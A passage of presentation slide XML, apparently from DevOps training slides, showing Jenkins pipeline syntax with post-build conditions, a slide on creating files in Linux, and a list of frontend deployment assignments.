          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543675" y="1692470"/>
            <a:ext cx="587700" cy="3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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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361"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372900" y="1394575"/>
            <a:ext cx="8520600" cy="2620200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2223" name="Google Shape;2223;p361"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259525" y="495100"/>
            <a:ext cx="6775800" cy="5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rgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Post CleanUp in Jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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362"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372900" y="211775"/>
            <a:ext cx="8520600" cy="4796700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pipeline {</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   agent any</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   tools { }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   stages {</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        stage("stage1") {</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>            steps { }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        }	</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>post {</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        always { }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        failure { }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>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rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2233" name="Google Shape;2233;p363"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pipeline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agent any</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stages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post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always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echo "This will always run regardless of the completion status"</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success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echo "This will run if the build succeeded"</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failure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echo "This will run if the job failed"</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unstable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echo "This will run if the completion status was 'unstable', usually by test failures"</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changed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echo "This will run if the state of the pipeline has changed"</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echo "For example, if the previous run failed but is now successful"</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fixed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echo "This will run if the previous run failed or unstable and now is successful"</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a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="163636"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="38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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create a file in linux ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119425" y="1161750"/>
            <a:ext cx="7293300" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-527050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ouch (built-in)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-527050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>vim     (3rd party)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-527050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>nano  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>(3rd party)</a:t>
            </a:r>
            <a:endParaRPr sz="4700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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364"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718950" y="2105450"/>
            <a:ext cx="7706100" cy="5283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200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Agent</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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365"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718950" y="2105450"/>
            <a:ext cx="7706100" cy="528300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Top level agents and stage level agents</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="533175"/>
            <a:ext cx="8520600" cy="92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DevOps </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployment </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments 1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For Frontend Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2249" name="Google Shape;2249;p366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1838275"/>
            <a:ext cx="8520600" cy="30777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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a ReactJs Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
